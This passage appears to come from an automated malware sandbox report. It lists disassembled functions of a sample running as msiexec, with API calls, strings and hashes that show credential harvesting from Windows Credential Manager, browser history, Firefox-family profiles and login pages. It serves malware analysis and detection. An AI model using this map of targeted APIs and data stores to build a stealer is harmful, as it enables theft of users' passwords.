                                                                    • memcpy.MSVCRT(?,00000015,?), ref: 004094D0
                                                                    • memcpy.MSVCRT(?,?,00000020), ref: 004094E8
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: memcpy$memcmp$ByteCharMultiWidememset
                                                                    • String ID:
                                                                    • API String ID: 3715365532-3916222277
                                                                    • Opcode ID: a80c2ed2cd7725c5ba05b8bc3cd527f2b50e73a4ba521d2eda8c640b4e065994
                                                                    • Instruction ID: d5c0d9b4f94ac501fd0f2fb5594fd033b2d13f4c98b4255323c8c53c7695c3f7
                                                                    • Opcode Fuzzy Hash: a80c2ed2cd7725c5ba05b8bc3cd527f2b50e73a4ba521d2eda8c640b4e065994
                                                                    • Instruction Fuzzy Hash: DDA1BA71900605ABDB21EF65D885BAFB7BCAF44304F01043FF945E6282EB78EA458B59
                                                                    Function 0040E01E Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 120fileCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    APIs
                                                                      • Part of subcall function 0040DD85: memset.MSVCRT ref: 0040DDAD
                                                                      • Part of subcall function 0040DD85: CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                                      • Part of subcall function 0040DD85: NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                                      • Part of subcall function 0040DD85: CloseHandle.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                                                                      • Part of subcall function 0040DD85: GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                                      • Part of subcall function 0040DD85: _wcsicmp.MSVCRT ref: 0040DEB2
                                                                      • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                                    • OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                                    • GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                                    • DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                                                    • GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                                      • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                                      • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                      • Part of subcall function 00409A45: GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                                      • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                                    • CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                                    • MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                                    • WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                                    • UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                                    • CloseHandle.KERNELBASE(?), ref: 0040E13E
                                                                    • CloseHandle.KERNEL32(00000000), ref: 0040E143
                                                                    • CloseHandle.KERNEL32(?), ref: 0040E148
                                                                    • CloseHandle.KERNEL32(?), ref: 0040E14D
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: File$Handle$Close$CreateProcess$CurrentTempView$??2@DirectoryDuplicateInformationMappingNameOpenPathQuerySizeSystemUnmapWindowsWrite_wcsicmpmemset
                                                                    • String ID: bhv
                                                                    • API String ID: 4234240956-2689659898
                                                                    • Opcode ID: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                                                                    • Instruction ID: 69536691d8562172d0558c987aea6dfe4ed17d6a9a6de0cf2c6621a9a97a0e87
                                                                    • Opcode Fuzzy Hash: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                                                                    • Instruction Fuzzy Hash: 15412775800218FBCF119FA6CC489DFBFB9FF09750F148466F504A6250D7748A50CBA8
                                                                    Function 00413F4F Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 29libraryloaderCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 692 413f4f-413f52 693 413fa5 692->693 694 413f54-413f5a call 40a804 692->694 696 413f5f-413fa4 GetProcAddress * 5 694->696 696->693
                                                                    APIs
                                                                      • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                      • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                      • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                      • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                    • GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                                                    • GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                                                    • GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                                                    • GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                                                    • GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                    • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                    • API String ID: 2941347001-70141382
                                                                    • Opcode ID: f3462473bc82ea1c51451d3a028beeb45a1422339b7559a3bc587941b48753d6
                                                                    • Instruction ID: 7b3d606b7d389a8205b465373562f67d85acf78e859b2fe1c5436fc88fb80995
                                                                    • Opcode Fuzzy Hash: f3462473bc82ea1c51451d3a028beeb45a1422339b7559a3bc587941b48753d6
                                                                    • Instruction Fuzzy Hash: BBF03470840340AECB706F769809E06BEF0EFD8B097318C2EE6C557291E3BD9098DE48
                                                                    Function 004466F4 Relevance: 18.1, APIs: 12, Instructions: 134COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 697 4466f4-44670e call 446904 GetModuleHandleA 700 446710-44671b 697->700 701 44672f-446732 697->701 700->701 702 44671d-446726 700->702 703 44675b-4467aa __set_app_type __p__fmode __p__commode call 4153f2 701->703 705 446747-44674b 702->705 706 446728-44672d 702->706 710 4467ac-4467b7 __setusermatherr 703->710 711 4467b8-44680e call 4468f0 _initterm __wgetmainargs _initterm 703->711 705->701 709 44674d-44674f 705->709 706->701 708 446734-44673b 706->708 708->701 712 44673d-446745 708->712 713 446755-446758 709->713 710->711 716 446810-446819 711->716 717 44681e-446825 711->717 712->713 713->703 718 4468d8-4468dd call 44693d 716->718 719 446827-446832 717->719 720 44686c-446870 717->720 723 446834-446838 719->723 724 44683a-44683e 719->724 721 446845-44684b 720->721 722 446872-446877 720->722 728 446853-446864 GetStartupInfoW 721->728 729 44684d-446851 721->729 722->720 723->719 723->724 724->721 726 446840-446842 724->726 726->721 730 446866-44686a 728->730 731 446879-44687b 728->731 729->726 729->728 732 44687c-446894 GetModuleHandleA call 41276d 730->732 731->732 735 446896-446897 exit 732->735 736 44689d-4468d6 _cexit 732->736 735->736 736->718
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: HandleModule_initterm$InfoStartup__p__commode__p__fmode__set_app_type__setusermatherr__wgetmainargs_cexitexit
                                                                    • String ID:
                                                                    • API String ID: 2827331108-0
                                                                    • Opcode ID: 7ba7b2652c13871cd0d5cae79e0f4a701fe2602556b2c3d333f15f3a91922bbb
                                                                    • Instruction ID: 0e3254bf032efe29fc581ce6ca9889a5a3d5d0d8e47fd2ea34fa35870f4f4cb9
                                                                    • Opcode Fuzzy Hash: 7ba7b2652c13871cd0d5cae79e0f4a701fe2602556b2c3d333f15f3a91922bbb
                                                                    • Instruction Fuzzy Hash: 9D51C474C41314DFEB21AF65D8499AD7BB0FB0A715F21452BE82197291D7788C82CF1E
                                                                    Function 0040C274 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 112COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • memset.MSVCRT ref: 0040C298
                                                                      • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E60F
                                                                      • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E629
                                                                      • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                                    • FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                                    • wcschr.MSVCRT ref: 0040C324
                                                                    • wcschr.MSVCRT ref: 0040C344
                                                                    • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                                    • GetLastError.KERNEL32 ref: 0040C373
                                                                    • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C39F
                                                                    • FindCloseUrlCache.WININET(?), ref: 0040C3B0
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: CacheFind$Entrymemset$Nextwcschr$??2@CloseErrorFirstLast
                                                                    • String ID: visited:
                                                                    • API String ID: 1157525455-1702587658
                                                                    • Opcode ID: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                                                                    • Instruction ID: 6629d855392f08d41decd2a192e4b6579142cf3eaa95f33c860a05aa0b18639b
                                                                    • Opcode Fuzzy Hash: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                                                                    • Instruction Fuzzy Hash: DA417F71D00219ABDB10EF92DC85AEFBBB8FF45714F10416AE904F7281D7389A45CBA9
                                                                    Function 0040E175 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 91COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 763 40e175-40e1a1 call 40695d call 406b90 768 40e1a7-40e1e5 memset 763->768 769 40e299-40e2a8 call 4069a3 763->769 771 40e1e8-40e1fa call 406e8f 768->771 775 40e270-40e27d call 406b53 771->775 776 40e1fc-40e219 call 40dd50 * 2 771->776 775->771 782 40e283-40e286 775->782 776->775 787 40e21b-40e21d 776->787 783 40e291-40e294 call 40aa04 782->783 784 40e288-40e290 free 782->784 783->769 784->783 787->775 788 40e21f-40e235 call 40742e 787->788 788->775 791 40e237-40e242 call 40aae3 788->791 791->775 794 40e244-40e26b _snwprintf call 40a8d0 791->794 794->775
                                                                    APIs
                                                                      • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                                    • memset.MSVCRT ref: 0040E1BD
                                                                      • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                                    • free.MSVCRT ref: 0040E28B
                                                                      • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                                      • Part of subcall function 0040AAE3: wcslen.MSVCRT ref: 0040AAF2
                                                                      • Part of subcall function 0040AAE3: _memicmp.MSVCRT ref: 0040AB20
                                                                    • _snwprintf.MSVCRT ref: 0040E257
                                                                      • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                      • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                      • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                      • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: free$_wcsicmpmemsetwcslen$_memicmp_snwprintfmemcpy
                                                                    • String ID: $ContainerId$Container_%I64d$Containers$Name
                                                                    • API String ID: 2804212203-2982631422
                                                                    • Opcode ID: 3292a8bc8b2a8f6d115ff62c82a82f0362dff8113198451487ff657a70090be0
                                                                    • Instruction ID: de93d03617a61f3aa6bbe184beafcfad76b4f566d35596b706efacabd7485ccb
                                                                    • Opcode Fuzzy Hash: 3292a8bc8b2a8f6d115ff62c82a82f0362dff8113198451487ff657a70090be0
                                                                    • Instruction Fuzzy Hash: 74318272D002196ADF10EFA6DC45ADEB7B8AF04344F1105BFE508B3191DB38AE598F99
                                                                    Function 0040BB98 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 145COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    APIs
                                                                      • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                      • Part of subcall function 0040CC26: CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                                      • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                                                    • memset.MSVCRT ref: 0040BC75
                                                                    • memset.MSVCRT ref: 0040BC8C
                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,0044E518,000000FF,?,00000FFF,00000000,00000000,?,?,?,0040B7D4,?,?), ref: 0040BCA8
                                                                    • memcmp.MSVCRT(?,00000000,00000005,?,?,?,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE), ref: 0040BCD6
                                                                    • memcpy.MSVCRT(00000024,?,00000020,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD2B
                                                                    • LocalFree.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD3D
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: memset$ByteCharCloseFileFreeHandleLocalMultiSizeWide_wcsicmpmemcmpmemcpy
                                                                    • String ID:
                                                                    • API String ID: 115830560-3916222277
                                                                    • Opcode ID: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
                                                                    • Instruction ID: 00a8249a540342db609c93f8c1f67c79963b4134db5221072d0e6ece1bb2d715
                                                                    • Opcode Fuzzy Hash: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
                                                                    • Instruction Fuzzy Hash: 3F41B372900219ABDB10ABA5CC85ADEB7ACEF04314F01057BB509F7292D7789E45CA99
                                                                    Function 0040C768 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 87COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    APIs
                                                                      • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1AE
                                                                      • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1B6
                                                                      • Part of subcall function 0040AA04: free.MSVCRT ref: 0040AA0B
                                                                      • Part of subcall function 0040C274: memset.MSVCRT ref: 0040C298
                                                                      • Part of subcall function 0040C274: FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                                      • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C324
                                                                      • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C344
                                                                      • Part of subcall function 0040C274: FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                                      • Part of subcall function 0040C274: GetLastError.KERNEL32 ref: 0040C373
                                                                      • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C439
                                                                      • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                                      • Part of subcall function 0040C3C3: _wcsupr.MSVCRT ref: 0040C481
                                                                      • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C4D0
                                                                      • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                                    • _wcslwr.MSVCRT ref: 0040C817
                                                                      • Part of subcall function 0040C634: wcslen.MSVCRT ref: 0040C65F
                                                                      • Part of subcall function 0040C634: memset.MSVCRT ref: 0040C6BF
                                                                    • wcslen.MSVCRT ref: 0040C82C
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: memset$free$CacheEntryEnumFindValuewcschrwcslen$ErrorFirstLastNext_wcslwr_wcsupr
                                                                    • String ID: /$/$http://www.facebook.com/$https://login.yahoo.com/config/login$https://www.google.com/accounts/servicelogin
                                                                    • API String ID: 2936932814-4196376884
                                                                    • Opcode ID: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                                                                    • Instruction ID: 5b72bd72183a146cc5fb8da473a5bce975bbff0c760a192580a28ed18ba85502
                                                                    • Opcode Fuzzy Hash: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                                                                    • Instruction Fuzzy Hash: 42218272A00244A6CF10BB6A9C8589E7B68EF44744B10457BB804B7293D67CDE85DB9D
                                                                    Function 0040BDB0 Relevance: 12.2, APIs: 8, Instructions: 151COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 886 40bdb0-40bdce call 404363 889 40bf63-40bf6f call 40440c 886->889 890 40bdd4-40bddd 886->890 892 40bdee 890->892 893 40bddf-40bdec CredEnumerateW 890->893 894 40bdf0-40bdf2 892->894 893->894 894->889 896 40bdf8-40be18 call 40b2cc wcslen 894->896 899 40bf5d 896->899 900 40be1e-40be20 896->900 899->889 900->899 901 40be26-40be42 wcsncmp 900->901 902 40be48-40be77 call 40bd5d call 404423 901->902 903 40bf4e-40bf57 901->903 902->903 908 40be7d-40bea3 memset 902->908 903->899 903->900 909 40bea5 908->909 910 40bea7-40beea memcpy 908->910 909->910 911 40bf11-40bf2d wcschr 910->911 912 40beec-40bf06 call 40b2cc _wcsnicmp 910->912 913 40bf38-40bf48 LocalFree 911->913 914 40bf2f-40bf35 911->914 912->911 917 40bf08-40bf0e 912->917 913->903 914->913 917->911
                                                                    APIs
                                                                      • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                                                                      • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                                                                      • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                                                                      • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                                                                      • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                                                                    • CredEnumerateW.ADVAPI32(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                                                    • wcslen.MSVCRT ref: 0040BE06
                                                                    • wcsncmp.MSVCRT ref: 0040BE38
                                                                    • memset.MSVCRT ref: 0040BE91
                                                                    • memcpy.MSVCRT(?,?,?,00000001,?,?,?,00000000,?), ref: 0040BEB2
                                                                    • _wcsnicmp.MSVCRT ref: 0040BEFC
                                                                    • wcschr.MSVCRT ref: 0040BF24
                                                                    • LocalFree.KERNEL32(?,?,?,?,00000001,?,?,?,00000000,?), ref: 0040BF48
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: AddressProc$CredEnumerateFreeLocal_wcsnicmpmemcpymemsetwcschrwcslenwcsncmp
                                                                    • String ID:
                                                                    • API String ID: 697348961-0
                                                                    • Opcode ID: 4320d3521706fdf8c6ed48fb05be967b0956d3d4dbd01890db6896aba47bd834
                                                                    • Instruction ID: 79a9ca8399314c5bcb3e205da5602351372edcdcc58f79068602210d8f55f42f
                                                                    • Opcode Fuzzy Hash: 4320d3521706fdf8c6ed48fb05be967b0956d3d4dbd01890db6896aba47bd834
                                                                    • Instruction Fuzzy Hash: 1851E9B5D002099FCF20DFA5C8859AEBBF9FF48304F10452AE919F7251E734A9458F69
                                                                    Function 00403C9C Relevance: 12.1, APIs: 6, Strings: 2, Instructions: 121COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • memset.MSVCRT ref: 00403CBF
                                                                    • memset.MSVCRT ref: 00403CD4
                                                                    • memset.MSVCRT ref: 00403CE9
                                                                    • memset.MSVCRT ref: 00403CFE
                                                                    • memset.MSVCRT ref: 00403D13
                                                                      • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                      • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                      • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                      • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                      • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                      • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                      • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                      • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                      • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                      • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                      • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                    • memset.MSVCRT ref: 00403DDA
                                                                      • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                      • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: memset$wcscpy$wcslen$_snwprintfmemcpywcscat
                                                                    • String ID: Waterfox$Waterfox\Profiles
                                                                    • API String ID: 1829478387-11920434
                                                                    • Opcode ID: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                                                                    • Instruction ID: d72014143a293005b417e5222852f61d3cfc405123c5957a7e6d01a12b636873
                                                                    • Opcode Fuzzy Hash: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                                                                    • Instruction Fuzzy Hash: 1E4133B294012C7ADB20EB56DC85ECF777CEF85314F1180ABB509B2181DA745B948FAA
                                                                    Function 00403E2D Relevance: 12.1, APIs: 6, Strings: 2, Instructions: 121COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • memset.MSVCRT ref: 00403E50
                                                                    • memset.MSVCRT ref: 00403E65
                                                                    • memset.MSVCRT ref: 00403E7A
                                                                    • memset.MSVCRT ref: 00403E8F
                                                                    • memset.MSVCRT ref: 00403EA4
                                                                      • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                      • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                      • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                      • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                      • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                      • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                      • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                      • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                      • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                      • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                      • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                    • memset.MSVCRT ref: 00403F6B
                                                                      • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                      • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: memset$wcscpy$wcslen$_snwprintfmemcpywcscat
                                                                    • String ID: Mozilla\SeaMonkey$Mozilla\SeaMonkey\Profiles
                                                                    • API String ID: 1829478387-2068335096
                                                                    • Opcode ID: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
                                                                    • Instruction ID: badb9319ce56d3a3e0b5d4601891faab39f88fc9b3936f94b46873e2979bc7df
                                                                    • Opcode Fuzzy Hash: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
                                                                    • Instruction Fuzzy Hash: F94133B294012CBADB20EB56DC85FCF777CAF85314F1180A7B509F2181DA785B848F6A
                                                                    Function 00403FBE Relevance: 12.1, APIs: 6, Strings: 2, Instructions: 121COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • memset.MSVCRT ref: 00403FE1
                                                                    • memset.MSVCRT ref: 00403FF6
                                                                    • memset.MSVCRT ref: 0040400B
                                                                    • memset.MSVCRT ref: 00404020
                                                                    • memset.MSVCRT ref: 00404035
                                                                      • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                      • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                      • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                      • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                      • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                      • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                      • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                      • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                      • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                      • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                      • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                    • memset.MSVCRT ref: 004040FC
                                                                      • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                      • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
